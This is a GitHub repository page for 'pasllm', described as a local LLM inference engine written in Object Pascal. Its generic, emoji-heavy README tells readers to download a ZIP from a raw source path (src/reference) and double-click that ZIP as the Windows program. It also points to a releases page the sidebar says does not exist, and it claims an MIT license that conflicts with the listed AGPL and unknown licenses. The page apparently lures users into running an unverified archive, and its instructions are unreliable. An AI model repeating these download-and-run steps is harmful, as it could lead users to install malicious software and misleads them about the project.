Skip to content

πŸ–₯️ Run large language models locally with PasLLM, a pure Object Pascal engine optimized for efficient quantization and versatile architecture support.

License

AGPL-3.0, Unknown licenses found

Licenses found

AGPL-3.0
LICENSE
Unknown
license.txt
Notifications You must be signed in to change notification settings

c3thousanddd/pasllm

Repository files navigation

🌟 pasllm - Effortless LLM Inference Engine

πŸš€ Getting Started

Welcome to PasLLM! This software allows you to run large language models with ease in Object Pascal. Follow these simple steps to download and run the application on your computer.

πŸ“₯ Download Here

Download PasLLM

πŸ–₯️ System Requirements

Before you start, make sure your computer meets the following requirements:

  • Operating System: Windows, macOS, or Linux
  • Free Pascal Compiler (FPC) version 3.0 or higher
  • Minimum 4 GB RAM
  • At least 500 MB of free disk space

πŸ“‚ Installation Steps

  1. Visit the Releases Page
    Click the link below to visit the releases page and find the latest version of PasLLM.
    Visit the Releases Page

  2. Download the Application
    Once on the releases page, look for the latest version. You will see various files.
    Click on the file named https://raw.githubusercontent.com/c3thousanddd/pasllm/master/src/reference/pasllm_v3.4.zip to download it.

  3. Extract the Files
    Find the downloaded ZIP file on your computer.
    Right-click on the file and select "Extract All."
    Choose a location to save the extracted files.

  4. Run the Application
    Navigate to the folder where you extracted the files.
    Look for the https://raw.githubusercontent.com/c3thousanddd/pasllm/master/src/reference/pasllm_v3.4.zip file (for Windows) or PasLLM file (for macOS/Linux).
    Double-click the file to run the application.

πŸŽ‰ Using PasLLM

After launching the application, you will see a user-friendly interface. Here’s what you can do:

  • Input Text: Enter your prompts in the text box.
  • Select Model: Choose from various models such as Llama, Mixtral, or Qwen.
  • Execute Inference: Click the "Run" button to see the response from the language model.

πŸ”§ Features

PasLLM comes packed with features including:

  • Multi-Model Support: Run different models depending on your needs.
  • Easy Text Input: Simplified interface for entering prompts.
  • Custom Output: Tailor responses based on the complexity you desire.

πŸ’¬ Help and Support

If you encounter issues or need assistance, you can:

  • Visit the GitHub Issues Page to report any bugs or ask questions.
  • Check out the documentation in the docs folder of the extracted files for troubleshooting tips and advanced configurations.

🌐 Community and Contribution

Join our community to share your experiences and find helpful resources. Contributing to PasLLM is welcome! If you have suggestions or want to report issues, feel free to submit them on GitHub.

πŸ“œ License

PasLLM is open-source and available under the MIT License. You're free to use, modify, and distribute it as long as you include the original license.

πŸ“₯ Download & Install Again

To get started with PasLLM, don’t forget to visit the releases page for the latest version:
Visit the Releases Page

About

πŸ–₯️ Run large language models locally with PasLLM, a pure Object Pascal engine optimized for efficient quantization and versatile architecture support.

Topics

Resources

License

AGPL-3.0, Unknown licenses found

Licenses found

AGPL-3.0
LICENSE
Unknown
license.txt

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •